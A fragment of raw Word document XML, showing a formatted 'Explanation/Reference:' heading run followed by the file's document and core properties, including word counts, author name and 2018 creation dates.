crime scene and is asked to perform an investigation. Which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following is the FIRST step the forensic expert needs to take the chain of custody?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Make a forensic copy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Create a hash of the hard rive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Recover the hard drive data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Update the evidence log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incident response manager has started to gather all the facts related to a SIEM alert showing multiple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systems may have been compromised. The manager has gathered these facts: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breach is currently indicated on six user PCs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One service account is potentially compromised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Executive management has been notified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which of the following phases of the IRP is the manager currently working?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Recovery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Eradication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Containment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Identification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stock trading company had the budget for enhancing its secondary datacenter approved. Since the main site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is a hurricane-affected area and the disaster recovery site is 100 mi (161 km) away, the company wants to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ensure its business is always operational with the least amount of man hours needed. Which of the following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types of disaster recovery sites should the company implement?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Hot site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Warm site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Cold site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Cloud-based site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systems administrator is attempting to recover from a catastrophic failure in the datacenter. To recover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domain controller, the systems administrator needs to provide the domain administrator credentials. Which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following account types is the system administrator using?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Shared accounts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Guest account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Service account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User account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49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User from two organizations, each with its own PKI, need to begin working together on a joint project. Which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following would allow the users of the separate PKIs to work together without connection errors?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Trust model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Stapling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Intermediate CA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Key escrow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A security analyst is migrating a pass-the-hash vulnerability on a Windows infrastructure. Given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requirement, which of the following should the security analyst do to MINIMIZE the risk?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Enable CHAP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Disable NTLM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Enable Kerebos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Disable PAP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organization requires users to provide their fingerprints to access an application. To improve security,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application developers intend to implement multifactor authentication. Which of the following should be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implemented?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Use a camera for facial recognition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Have users sign their name naturally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Require a palm geometry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Implement iris recognition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analyst is reviewing an assessment report that includes software versions, running services,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supported encryption algorithms, and permission settings. Which of the following produced the report?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Vulnerability scanner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Protocol analyzer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Network mapper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Web inspector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Chief Information Officer (CIO) asks the company's security specialist if the company should spend any funds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on malware protection for a specific server. Based on a risk assessment, the ARO value of a malware infection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for a server is 5 and the annual cost for the malware protection is $2500. Which of the following SLE values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warrants a recommendation against purchasing the malware protection?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$500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$1000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$2000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$2500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computer resource center issue smartphones to all first-level and above managers. The managers have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ability to install mobile tools. Which of the following tools should be implemented with the type of tools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managers installed?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A. Download manager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Content manager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Segmentation manager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Application manager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systems administrator wants to provide for and enforce wireless access accountability during events where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external speakers are invited to make presentations to a mixed audience of employees and non-employees.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should the administrator implement?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Shared accounts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Preshared passwords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Least privilege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Sponsored guest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recent internal audit is forcing a company to review each internal business unit's VMs because the cluster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they are installed on is in danger of running out of computer resources. Which of the following vulnerabilities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exist?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Buffer overflow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End-of-life systems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System sprawl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Weak configuration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administrator has found a hash in the environment known to belong to malware. The administrator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then finds this file to be in the preupdate area of the OS, which indicated it was pushed from the central patch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system.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File: winx86_adobe_upgrade.exe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Hash: 99ac28bede43ab869b853ba62c4ea243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Administrator pulls a report from the patch management system with the following output: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Install Date Package Name Target Device Hash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10/10/2017 java_11.2_x64.exe HQ PC's 01ab28bbde63aa879b35bba62cdea282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10/10/2017 winx86_adobe_flash_upgrade.exe HQ PC's 99ac28bede43ab86b853ba62c4ea243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Given the above output, which of the following MOST likely happened?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file was corrupted after it left the patch system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The file was infected when the patch manager downloaded it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The file was not approved in the application whitelist system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file was embedded with a logic bomb to evade detection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>QUESTION 58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Two users must encrypt and transmit large amounts of data between them. Which of the following should they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 to encrypt and transmit the data?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Symmetric algorithm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Hash function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Digital signature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Obfuscation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59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new Chief Information Officer (CIO) has been reviewing the badging and decides to write a policy that all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employees must have their badges rekeyed at least annually. Which of the following controls BEST describes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this policy?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Physical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Corrective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Technical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Administrative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software developer is concerned about DLL hijacking in an application being written. Which of the following is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MOST viable mitigation measure of this type of attack?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DLL of each application should be set individually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All calls to different DLLs should be hard-coded in the application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Access to DLLs from the Windows registry should be disabled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affected DLLs should be renamed to avoid future hijacking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engineer wants to implement a site-to-site VPN that will require SSL certificates for mutual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authentication. Which of the following should the engineer implement if the design requires client MAC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addresses to be visible across the tunnel?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Tunnel mode IPSec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Transport mode VPN IPSec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L2TP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SSL VPN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application was recently compromised after some malformed data came in via web form. Which of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would MOST likely have prevented this?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Input validation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Proxy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Stress testing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D. Encoding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While working on an incident, Joe, a technician, finished restoring the OS and applications on a workstation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from the original media. Joe is about to begin copying the user's files back onto the hard drive. Which of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incident response steps is Joe working on now?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Recovery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Eradication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Containment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Identification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systems administrator found a suspicious file in the root of the file system. The file contains URLs,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usernames, passwords, and text from other documents being edited on the system. Which of the following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types of malware would generate such a file?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Keylogger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Rootkit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Bot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computer emergency response team is called at midnight to investigate a case in which a mail server was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restarted. After an initial investigation, it was discovered that email is being exfiltrated through an active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connection. Which of the following is the NEXT step the team should take?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Identify the source of the active connection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Perform eradication of active connection and recover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Performance containment procedure by disconnecting the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Format the server and restore its initial configuration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remote intruder wants to take inventory of a network so exploits can be researched. The intruder is looking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for information about software versions on the network. Which of the following techniques is the intruder using?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Banner grabbing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Port scanning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Packet sniffing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Virus scanning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analyst is reviewing a simple program for potential security vulnerabilities before being deployed to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Windows server. Given the following code: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void foo (char *bar)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car random_user_input[12];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stropy (random_user_input, bar);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vulnerabilities is present?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Bad memory pointer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Buffer overflow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Integer overflow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Backdoor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company has a data classification system with definitions for "Private" and "Public". the company's security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policy outlines how data should be protected based on type. The company recently added data type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"Proprietary". Which of the following is the MOST likely reason the company added this data type?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Reduced cost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More searchable data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Better data classification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Expanded authority of the privacy officer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69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technician is configuring an access management system to track and record user actions. Which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following functions should the technician configure?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Accounting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Authorization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Authentication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Identification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administrator installed a new network scanner that identifies new host systems on the network.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did the security administrator install?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Vulnerability scanner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Network-based IDS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Rogue system detection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Configuration compliance scanner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A Chief Information Officer (CIO) has decided it is not cost effective to implement safeguards against a known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vulnerability. Which of the following risk responses does this BEST describe?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Transference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Avoidance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Mitigation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Acceptance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audit takes place after company-wide restructuring, in which several employees changed roles.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deficiencies are found during the audit regarding access to confidential data.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Employee Job Function Audit Finding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Ann Sales Manager *Access to confidential payroll shares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*Access to payroll processing program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*Access to marketing shares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Jeff Marketing Director *Access to human resources annual review folder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*Access to shared human resources mailbox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John Sales Manager *Active account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*Access to human resources annual review folder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*Access to confidential payroll shares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would be the BEST method to prevent similar audit finding in the future?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Implement separation of duties for the payroll department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Implement a DLP solution on the payroll and human resources reviews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Implement rule-based access controls on the human resources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Implement regular permission auditing and reviews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technician is investigating a potentially compromised device with the following symptoms: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Browser slowness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Frequent browser crashes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Hourglass stuck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New search toolbar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Increased memory consumption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types of malware has infected the system?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Man-in-the-browser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Spoofer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Spyware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Adware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penetration tester has written an application that performs a bit-by-bit XOR 0xFF operation on binaries prior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to transmission over untrusted media. Which of the following BEST describes the action performed by this type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of application?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Hashing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Key exchange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C. Encryption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Obfusication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audit reported has identifies a weakness that could allow unauthorized personnel access to the facility at its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main entrance and from there gain access to the network. Which of the following would BEST resolve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vulnerability?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Faraday cage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Air gap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Mantrap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Bollards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When attempting to secure a mobile workstation, which of the following authentication technologies rely on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user's physical characteristics?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MAC address table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Retina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Fingerprint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Two-factor authentication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CAPTCHA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F. Password string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Systems administrator and key support staff come together to simulate a hypothetical interruption of service.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team updates the disaster recovery processes and documentation after meeting. Which of the following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describes the team's efforts?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Business impact analysis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Continuity of operation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Tabletop exercise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Order of restoration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company has two wireless networks utilizing captive portals. Some employees report getting a trust error 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their browsers when connecting to one of the networks. Both captive portals are using the same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certificate for authentication, but the analyst notices the following differences between the two certificate details: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Certificate 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Certificate Path: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Geotrust Global CA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*company.com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Certificate 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Certificate Path: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*company.com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would resolve the problem?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Use a wildcard certificate.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Use certificate chaining.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Use a trust model.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Use an extended validation certificate.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79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Company A has acquired Company B. Company A has different domains spread globally, and typically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migrates its acquisitions infrastructure under its own domain infrastructure. Company B, however, cannot be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merged into Company A's domain infrastructure. Which of the following methods would allow the two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companies to access one another's resources?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Attestation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Federation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Single sign-on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Kerberos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80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technician is configuring a load balancer for the application team to accelerate the network performance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their applications. The applications are hosted on multiple servers and must be redundant. Given this scenario,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would be the BEST method of configuring the load balancer?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Round-robin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Weighted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Least connection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Locality-based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81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Ann is the IS manager for several new systems in which the classifications of the systems' data are being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decided. She is trying to determine the sensitivity level of the data being processed. Which of the following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people should she consult to determine the data classification?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Steward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Custodian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User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Owner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82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organization's employees currently use three different sets of credentials to access multiple internal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resources. Management wants to make this process less complex. Which of the following would be the BEST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option to meet this goal?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Transitive trust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Single sign-on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Federation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Secure token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83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external attacker can modify the ARP cache of an internal computer. Which of the following types of attacks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is described?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Replay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Spoofing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DNS poisoning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Client-side attack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84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systems administrator has isolated an infected system from the network and terminated the malicious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process from executing. Which of the following should the administrator do NEXT according to the incident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response process?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Restore lost data from a backup.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Wipe the system.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Document the lessons learned.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Determine the scope of impact.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85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new security administrator ran a vulnerability scanner for the first time and caused a system outage. Which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following types of scans MOST likely caused the outage?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Non-intrusive credentialed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Non-intrusive non-credentialed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Intrusive credentialed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Intrusive non-credentialed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86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analyst is hardening a WiFi infrastructure. The primary requirements are the following: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infrastructure must allow staff to authenticate using the most secure method.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infrastructure must allow guests to use an "open" WiFi network that logs valid email addresses before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granting access to the Internet.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Given these requirements, which of the following statements BEST represents what the analyst should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recommend and configure?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Configure a captive portal for guests and WPS for staff.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B. Configure a captive portal for staff and WPA for guests.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Configure a captive portal for staff and WEP for guests.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Configure a captive portal for guest and WPA2 Enterprise for staff.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87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administrator is trying to eradicate a worm, which is spreading throughout the organization, using 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old remote vulnerability in the SMB protocol. The worm uses Nmap to identify target hosts within the company.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administrator wants to implement a solution that will eradicate the current worm and any future attacks that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may be using zero-day vulnerabilities. Which of the following would BEST meet the requirements when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implemented?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Host-based firewall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Enterprise patch management system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Network-based intrusion prevention system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Application blacklisting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File integrity checking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88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is a deployment concept that can be used to ensure only the required OS access is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exposed to software applications?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Staging environment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Sandboxing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Secure baseline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Trusted OS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89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procedure differs from a policy in that it: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is a high-level statement regarding the company's position on a topic.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sets a minimum expected baseline of behavior.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provides step-by-step instructions for performing a task.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describes adverse actions when violations occur.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90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Ann, a user, reports she is unable to access an application from her desktop. A security analyst verifies Ann's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access and checks the SIEM for any errors. The security analyst reviews the log file from Ann's system and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notices the following output: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2017--08-21 10:48:12 DROP TCP 172.20.89.232 239.255.255.255 443 1900 250 -------- RECEIVE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2017--08-21 10:48:12 DROP UDP 192.168.72.205 239.255.255.255 443 1900 250 -------- RECEIVE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is MOST likely preventing Ann from accessing the application from the desktop?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Web application firewall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B. DLP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Host-based firewall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UTM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Network-based firewall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Webmail is being blocked. The 250 response code is for SMTP.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91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types of penetration test will allow the tester to have access only to password hashes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prior to the penetration test?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Black box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Gray box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Credentialed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White box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92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threats has sufficient knowledge to cause the MOST danger to an organization?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Competitors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Insiders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Hacktivists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Script kiddies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93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While troubleshooting a client application connecting to the network, the security administrator notices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error: Certificate is not valid. Which of the following is the BEST way to check if the digital certificate is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valid?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PKI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CRL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CSR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IPSec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94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To determine the ALE of a particular risk, which of the following must be calculated? (Select TWO).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ARO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ROI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RPO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RTO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95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A business sector is highly competitive, and safeguarding trade secrets and critical information is paramount.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On a seasonal basis, an organization employs temporary hires and contractor personnel to accomplish its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mission objectives. The temporary and contract personnel require access to network resources only when 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clock. Which of the following account management practices are the BEST ways to manage these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accounts?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Employ time-of-day restrictions.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Employ password complexity.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Employ a random key generator strategy.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Employ an account expiration strategy.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Employ a password lockout policy.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96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locations contain the MOST volatile data?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SSD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Paging file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RAM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Cache memory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97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Ann, a customer, is reporting that several important files are missing from her workstation. She recently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received communication from an unknown party who is requesting funds to restore the files. Which of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attacks has occurred?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Ransomware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Keylogger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Buffer overflow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Rootkit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98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Every morning, a systems administrator monitors failed login attempts on the company's log management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server. The administrator notices the DBAdmin account has five failed username and/or password alerts during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ten-minute window. The systems administrator determines the user account is a dummy account used to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attract attackers. Which of the following techniques should the systems administrator implement?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Role-based access control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Honeypot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Rule-based access control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Password cracker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99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Joe, a user, has been trying to send Ann, a different user, an encrypted document via email. Ann has not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received the attachment but is able to receive the header information. Which of the following is MOST likely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preventing Ann from receiving the encrypted file?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Unencrypted credentials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Authentication issues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Weak cipher suite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Permission issues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100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systems administrator is configuring a system that uses data classification labels. Which of the following will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administrator need to implement to enforce access control?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Discretionary access control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Mandatory access control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Role-based access control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Rule-based access control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101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analyst is using a vulnerability scanner to look for common security misconfigurations on devices. Which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following might be identified by the scanner? (Select TWO).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firewall is disabled on workstations.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SSH is enabled on servers.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Browser homepages have not been customized.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Default administrator credentials exist on networking hardware.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The OS is only set to check for updates once a day.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102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analyst is reviewing patches on servers. One of the servers is reporting the following error message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the WSUS management console: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computer has not reported status in 30 days.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Given this scenario, which of the following statements BEST represents the issue with the output above?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computer in question has not pulled the latest ACL policies for the firewall.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The computer in question has not pulled the latest GPO policies from the management server.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The computer in question has not pulled the latest antivirus definitions from the antivirus program.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computer in question has not pulled the latest application software updates.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103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Two users must encrypt and transmit large amount of data between them. Which of the following should they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 to encrypt and transmit the data?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Symmetric algorithm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Hash function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C. Digital signature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Obfuscation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104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administrator is reviewing the following PowerShell script referenced in the Task Scheduler on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database server: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$members = GetADGroupMemeber -Identity "Domain Admins" -Recursive | Select -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ExpandProperty name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if ($members -notcontains "JohnDoe"){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Remove-Item -path C:\Database -recurse -force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Which of the following did the security administrator discover?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Ransomeware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Backdoor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Logic bomb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Trojan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105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bank is experiencing a DoS attack against an application designed to handle 500IP-based sessions. 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addition, the perimeter router can only handle 1Gbps of traffic. Which of the following should be implemented to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prevent a DoS attacks in the future?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Deploy multiple web servers and implement a load balancer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Increase the capacity of the perimeter router to 10 Gbps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Install a firewall at the network to prevent all attacks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Use redundancy across all network devices and services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106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malicious system continuously sends an extremely large number of SYN packets to a server. Which of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BEST describes the resulting effect?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server will be unable to server clients due to lack of bandwidth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the server's firewall will be unable to effectively filter traffic due to the amount of data transmitted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The server will crash when trying to reassemble all the fragmented packets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server will exhaust its memory maintaining half-open connections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107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systems administrator is deploying a new mission essential server into a virtual environment. Which of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is BEST mitigated by the environment's rapid elasticity characteristic?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Data confidentiality breaches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VM escape attacks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Lack of redundancy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D. Denial of service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108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is the proper order for logging a user into a system from the first step to the last step?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Identification, authentication, authorization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Identification, authorization, authentication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Authentication, identification, authorization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Authentication, identification, authorization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Authorization, identification, authentication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109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company stores highly sensitive data files used by the accounting system on a server file share.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accounting system uses a service account named accounting-svc to access the file share. The data is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protected will a full disk encryption, and the permissions are set as follows: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File system permissions: Users = Read Only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Share permission: accounting-svc = Read Only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Given the listed protections are in place and unchanged, to which of the following risks is the data still subject?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Exploitation of local console access and removal of data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Theft of physical hard drives and a breach of confidentiality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Remote exfiltration of data using domain credentials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Disclosure of sensitive data to third parties due to excessive share permissions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110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bank uses a wireless network to transmit credit card purchases to a billing system. Which of the following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would be MOST appropriate to protect credit card information from being accessed by unauthorized individuals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outside of the premises?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Air gap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Infrared detection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Faraday cage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Protected distributions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111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Joe, a salesman, was assigned to a new project that requires him to travel to a client site. While waiting for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flight, Joe decides to connect to the airport wireless network without connecting to a VPN, and then sends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confidential emails to fellow colleagues. A few days later, the company experiences a data breach. Upon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investigation, the company learns Joe's emails were intercepted. Which of the following MOST likely caused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data breach?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Policy violation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B. Social engineering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Insider threat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Zero--day attack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112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help desk technician receives a phone call from an individual claiming to be an employee of the organization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and requesting assistance to access a locked account. The help desk technician asks the individual to provide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proof of identity before access can be granted. Which of the following types of attack is the caller performing?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Phishing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Shoulder surfing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Impersonation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Dumpster diving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113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Confidential emails from an organization were posted to a website without the organization's knowledge. Upon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investigation, it was determined that the emails were obtained from an internal actor who sniffed the emails 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plain text. Which of the following protocols, if properly implemented, would have MOST likely prevented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emails from being sniffed?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Secure IMAP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DNSSEC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S/MIME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SMTPS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HTTPS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SMTPS (Simple Mail Transfer Protocol Secure) is a deprecated method for securing SMTP with transport layer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security. It is intended to provide authentication of the communication partners, as well as data integrity and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confidentiality.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SMTPS is not a proprietary protocol and not an extension of SMTP. It is just a way to secure SMTP at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transport layer. SMTPS uses port 465.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114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company wants to implement an access management solution that allows employees to use the same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usernames and passwords for multiple applications without having to keep multiple credentials synchronized.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solutions would BEST meet these requirements?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Multifactor authentication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SSO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Biometrics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PKI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Federation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 xml:space="preserve">Correct Answer: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>BE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115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external auditor visits the human resources department and performs a physical security assessment.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auditor observed documents on printers that are unclaimed. A closer look at these documents reveals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employee names, addresses, ages, and types of medical and dental coverage options each employee has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selected. Which of the following is the MOST appropriate actions to take?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Flip the documents face down so no one knows these documents are PII sensitive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Shred the documents and let the owner print the new set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Retrieve the documents, label them with a PII cover sheet, and return them to the printer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Report to the human resources manager that their personnel are violating a privacy policy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116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authentication concepts is a gait analysis MOST closely associated?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Somewhere you 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Something you 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Something you do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Something you know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117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metrics are used to calculate the SLE?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ROI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ARO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MTBF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MTTF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F. TCO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118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Due to regulatory requirements, server in a global organization must use time synchronization. Which of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represents the MOST secure method of time synchronization?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server should connect to external Stratum 0 NTP servers for synchronization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The server should connect to internal Stratum 0 NTP servers for synchronization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The server should connect to external Stratum 1 NTP servers for synchronization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server should connect to external Stratum 1 NTP servers for synchronization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Configure your own Internal NTP hierarchical service for your network. It is possible to purchase Stratum 1 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Stratum 0 NTP appliances to use internally for less than the cost of a typical server. It is also possible to set up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private NTP server at a very low cost. The feasibility of setting up a commercial off the shelf (COTS) NTP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server is evidenced in a recent effort to configure a Raspberry Pi computer as a Stratum-1 server. If you do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decide to configure you own, please consider the following best practices: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Standardize to UTC time. Within an enterprise, standardize all systems to coordinated universal time (UTC).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Standardizing to UTC simplifies log correlation within the organization and with external parties no matter what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time zone the device being synchronized is located in.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Securing the network time service. Restrict the commands that can be used on the stratum servers. Do not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allow public queries of the stratum servers. Only allow known networks/hosts to communicate with their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respective stratum servers.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Consider the business need for cryptography. Many administrators try to secure their networks with encrypted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communications and encrypted authentication. I would introduce a note of caution here because although there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are cryptographic services associated with NTP for securing NTP communications, the use of encryption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introduces more sources for problems, such as requiring key management, and it also requires a higher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computational overhead.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Remember Segal's Law. Ideally, it would work to have three or more Stratum 0 or Stratum 1 servers and use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those servers as primary masters. Remember Segal's Law: having two NTP servers makes it hard to know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one is accurate. Two Stratum 0 servers would provide a more accurate timestamp because they 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using a time source that is considered definitive.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119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When sending messages using symmetric encryption, which of the following must happen FIRST?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Exchange encryption key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Establish digital signatures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Agree on an encryption method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Install digital certificates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120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scenarios BEST describes an implementation of non-repudiation?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 user logs into a domain workstation and access network file shares for another department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A user remotely logs into the mail server with another user's credentials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 user sends a digitally signed email to the entire finance department about an upcoming meeting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 user access the workstation registry to make unauthorized changes to enable functionality within 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application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121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office manager found a folder that included documents with various types of data relating to corporate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clients. The office manager notified the data included dates of birth, addresses, and phone numbers for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clients. The office manager then reported this finding to the security compliance officer. Which of the following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portions of the policy would the security officer need to consult to determine if a breach has occurred?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Public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Private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PHI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PII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122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is an asymmetric function that generates a new and separate key every time it runs?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RSA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DSA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DHE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HMAC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PBKDF2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Although Diffie–Hellman key agreement itself is a non-authenticated key-agreement protocol, it provides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basis for a variety of authenticated protocols, and is used to provide forward secrecy in Transport Layer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Security's ephemeral modes (referred to as EDH or DHE depending on the cipher suite).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123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would be considered multifactor authentication?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Hardware token and smart card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Voice recognition and retina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Strong password and fingerprint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PIN and security questions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124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Users report the following message appear when browsing to the company's secure site: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>This website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cannot be trusted. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Which of the following actions should a security analyst take to resolve these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messages?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Verify the certificate has not expired on the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Ensure the certificate has a .pfx extension on the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Update the root certificate into the client computer certificate store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Install the updated private key on the web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Have users clear their browsing history and relaunch the session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125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Despite having implemented password policies, users continue to set the same weak passwords and reuse old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passwords. Which of the following technical controls would help prevent these policy violations?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Password expiration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Password length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C. Password complexity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Password history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Password lockout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126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auditor is testing perimeter security in a building that is protected by badge readers. Which of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following types of attacks would MOST likely gain access?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Phishing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Man-in-the-middle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Tailgating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Watering hole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Shoulder surfing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127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encryption methods does PKI typically use to securely protect keys?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Elliptic curve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Digital signatures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Asymmetric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Obfuscation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128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department head at a university resigned on the first day of spring semester. It was subsequently determined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that the department head deleted numerous files and directories from the server-based home directory while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campus was closed. Which of the following policies or procedures could have prevented this form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occurring?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Time-of-day restrictions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Permissions auditing and review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Offboarding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Account expiration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129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organization wants to upgrade its enterprise-wide desktop computer solution. The organization currently has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500 PCs active on the network. the Chief Information Security Officer (CISO) suggests that the organization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employ desktop imaging technology for such a large scale upgrade. Which of the following is a security benefit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of implementing an imaging solution?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it allows for faster deployment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it provides a consistent baseline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It reduces the number of vulnerabilities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D. It decreases the boot time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130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senior incident response manager receives a call about some external IPs communicating with internal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computers during off hours. Which of the following types of malware is MOST likely causing this issue?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Botnet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Ransomware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Polymorphic malware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Armored virus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131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organization has implemented an IPSec VPN access for remote users. Which of the following IPSec modes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would be the MOST secure for this organization to implement?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Tunnel mode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Transport mode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AH-only mode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ESP-only mode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both ESP and AH cases with IPSec Transport mode, the IP header is exposed. The IP header is not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exposed in IPSec Tunnel mode.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132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engineer is configuring a wireless network with EAP-TLS. Which of the following activities is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requirement for this configuration?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Setting up a TACACS+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Configuring federation between authentication servers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Enabling TOTP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Deploying certificates to endpoint devices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133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Several workstations on a network are found to be on OS versions that are vulnerable to a specific attack.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is considered to be a corrective action to combat this vulnerability?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Install an antivirus definition patch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Educate the workstation users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Leverage server isolation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Install a vendor-supplied patch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Install an intrusion detection system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134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user suspects someone has been accessing a home network without permission by spoofing the MAC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address of an authorized system. While attempting to determine if an unauthorized user is logging into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home network, the user reviews the wireless router, which shows the following table for systems that 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currently on the home network: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Hostname IP Address MAC MAC Filter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DadPC 192.168.1.15 00:1D:1A:44:17:B5 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MomPC 192.168.1.15 21:13:D6:C5:42:A2 Off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JuniorPC 192.168.2.16 42:A7:D1:25:11:52 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Unknown 192.168.1.18 10:B3:22:1A:FF:21 Off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should be the NEXT step to determine if there is an unauthorized user on the network?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Apply MAC filtering and see if the router drops any of the systems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Physically check each of the authorized systems to determine if they are logged onto the network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Deny the "unknown" host because the hostname is not known and MAC filtering is not applied to this host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Conduct a ping sweep of each of the authorized systems and see if an echo response is received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Dad's PC and Mom's PC have the same IP address. One of them is doing ARP spoofing.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135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POODLE attack is an MITM exploit that affects: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TLS1.0 with CBC mode cipher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SSLv2.0 with CBC mode cipher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SSLv3.0 with CBC mode cipher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SSLv3.0 with ECB mode cipher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flaw was found in the way SSL 3.0 handled padding bytes when decrypting messages encrypted using block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ciphers in cipher block chaining (CBC) mode.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How To Protect your Server Against the POODLE SSLv3 Vulnerability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On October 14th, 2014, a vulnerability in version 3 of the SSL encryption protocol was disclosed. This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vulnerability, dubbed POODLE (Padding Oracle On Downgraded Legacy Encryption), allows an attacker to read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information encrypted with this version of the protocol in plain text using a man-in-the-middle attack.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Although SSLv3 is an older version of the protocol which is mainly obsolete, many pieces of software still fall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back on SSLv3 if better encryption options are not available. More importantly, it is possible for an attacker to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force SSLv3 connections if it is an available alternative for both participants attempting a connection.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POODLE vulnerability affects any services or clients that make it possible to communicate using SSLv3.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Because this is a flaw with the protocol design, and not an implementation issue, every piece of software that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uses SSLv3 is vulnerable.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To find out more information about the vulnerability, consult the CVE information found at CVE-2014-3566.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What is the POODLE Vulnerability?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POODLE vulnerability is a weakness in version 3 of the SSL protocol that allows an attacker in a man-inthe-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middle context to decipher the plain text content of an SSLv3 encrypted message.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Who is Affected by this Vulnerability?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This vulnerability affects every piece of software that can be coerced into communicating with SSLv3. This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means that any software that implements a fallback mechanism that includes SSLv3 support is vulnerable and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can be exploited.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Some common pieces of software that may be affected are web browsers, web servers, VPN servers, mail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servers, etc.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How Does It Work?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short, the POODLE vulnerability exists because the SSLv3 protocol does not adequately check the padding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bytes that are sent with encrypted messages.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Since these cannot be verified by the receiving party, an attacker can replace these and pass them on to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intended destination. When done in a specific way, the modified payload will potentially be accepted by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recipient without complaint.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 average of once out of every 256 requests will accepted at the destination, allowing the attacker to decrypt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single byte. This can be repeated easily in order to progressively decrypt additional bytes. Any attacker able to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repeatedly force a participant to resend data using this protocol can break the encryption in a very short amount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of time.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How Can I Protect Myself?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Actions should be taken to ensure that you are not vulnerable in your roles as both a client and a server. Since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encryption is usually negotiated between clients and servers, it is an issue that involves both parties.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Servers and clients should should take steps to disable SSLv3 support completely. Many applications use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better encryption by default, but implement SSLv3 support as a fallback option. This should be disabled, as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malicious user can force SSLv3 communication if both participants allow it as an acceptable method.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136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Security administrators attempted corrective action after a phishing attack. Users are still experiencing trouble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logging in, as well as an increase in account lockouts. Users' email contacts are complaining of an increase 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spam and social networking requests. Due to the large number of affected accounts, remediation must be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accomplished quickly. Which of the following actions should be taken FIRST?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Disable the compromised accounts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Update WAF rules to block social networks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Remove the compromised accounts with all AD groups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Change the compromised accounts' passwords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Disable the open relay on the email server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F. Enable sender policy framework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EF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Sender Policy Framework (SPF) is a simple email-validation system designed to detect email spoofing by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providing a mechanism to allow receiving mail exchangers to check that incoming mail from a domain comes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from a host authorized by that domain's administrators.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 a Small Business Server environment, you may have to prevent your Microsoft Exchange Server-based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server from being used as an open relay SMTP server for unsolicited commercial e-mail messages, or spam.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You may also have to clean up the Exchange server's SMTP queues to delete the unsolicited commercial email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messages. If your Exchange server is being used as an open SMTP relay, you may experience one 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more of the following symptoms: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The Exchange server cannot deliver outbound SMTP mail to a growing list of e-mail domains.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Internet browsing is slow from the server and from local area network (LAN) clients.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Free disk space on the Exchange server in the location of the Exchange information store databases or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Exchange information store transaction logs is reduced more rapidly than you expect.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The Microsoft Exchange information store databases spontaneously dismount. You may be able to manually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mount the stores by using Exchange System Manager, but the stores may dismount on their own after they run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for a short time. For more information, click the following article number to view the article in the Microsoft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Knowledge Base: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137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Ann, a security administrator, wants to ensure credentials are encrypted in transit when implementing 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RADIUS server for SSO. Which of the following are needed given these requirements? (Select TWO)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Public key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Shared key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Elliptic curve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MD5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Private key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F. DES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138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allows an auditor to test proprietary-software compiled code for security flaws?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Fuzzing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Static review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Code signing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Regression testing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139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Which of the following s the BEST reason to run an untested application is a sandbox?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To allow the application to take full advantage of the host system's resources and storage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To utilize the host systems antivirus and firewall applications instead of running it own protection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To prevent the application from acquiring escalated privileges and accessing its host system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To increase application processing speed so the host system can perform real-time logging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C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140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manager wants to distribute a report to several other managers within the company. Some of them reside in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remote locations that are not connected to the domain but have a local server. Because there is sensitive data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within the report and the size is beyond the limit of the email attachment size, emailing the report is not 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option. Which of the following protocols should be implemented to distribute the report securely? (Select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THREE)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S/MIME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SSH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C. SNMPv3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FTPS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 SRTP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F. HTTPS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G. LDAPS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141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company is performing an analysis of the corporate enterprise network with the intent of identifying what will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cause losses in revenue, referrals, and/or reputation when out of commission. Which of the following is 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element of a BIA that is being addressed?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Mission-essential function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Single point of failure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backup and restoration plans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Identification of critical systems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BIA is composed of the following three steps: Determine mission/business processes and recovery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criticality. Mission/business processes supported by the system are identified and the impact of a system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disruption to those processes is determined along with outage impacts and estimated downtime.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142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Ann, a user, states that her machine has been behaving erratically over the past week. She has experienced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slowness and input lag and found text files that appear to contain pieces of her emails or online conversations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with coworkers. The technician runs a standard virus scan but detects nothing. Which of the following types of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malware has infected the machine?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Ransomware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Rootkit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Backdoor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Keylogger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143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security analyst is attempting to identify vulnerabilities in a customer's web application without impacting the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system or its data. Which of the following BEST describes the vulnerability scanning concept performed?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Aggressive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Passive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Non-credentialed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Compliance scan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B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Passive scanning is a method of vulnerability detection that relies on information gleaned from network data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that is captured from a target computer without direct interaction.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Packet sniffing applications can be used for passive scanning to reveal information such as operating system,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known protocols running on non-standard ports and active network applications with known bugs. Passive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scanning may be conducted by a network administrator scanning for security vulnerabilities or by an intruder as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preliminary to an active attack.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For an intruder, passive scanning's main advantage is that it does not leave a trail that could alert users or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administrators to their activities. For an administrator, the main advantage is that it doesn't risk causing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undesired behavior on the target computer, such as freezes. Because of these advantages, passive scanning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need not be limited to a narrow time frame to minimize risk or disruption, which means that it is likely to return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more information.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Passive scanning does have limitations. It is not as complete in detail as active vulnerability scanning and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cannot detect any applications that are not currently sending out traffic; nor can it distinguish false information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put out for obfuscation.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144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systems administrator wants to implement a wireless protocol that will allow the organization to authenticate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mobile devices prior to providing the user with a captive portal login. Which of the following should the systems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administrator configure?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L2TP with MAC filtering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EAP-TTLS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WPA2-CCMP with PSK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RADIUS federation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D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RADIUS generally includes 802.1X that pre-authenticates devices.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QUESTION 145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user receives an email from ISP indicating malicious traffic coming from the user's home network is detected.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traffic appears to be Linux-based, and it is targeting a website that was recently featured on the news as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being taken offline by an Internet attack. The only Linux device on the network is a home surveillance camera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system. Which of the following BEST describes what is happening?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The camera system is infected with a bot.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The camera system is infected with a RAT.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The camera system is infected with a Trojan.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The camera system is infected with a backdoor.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Correct Answer: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>A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Section: (none)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E45B1" w:rsidRDefault="004E45B1" w:rsidP="004E4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Explanation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF417B" w:rsidRDefault="004E45B1" w:rsidP="004E45B1">
      <w:r>
        <w:rPr>
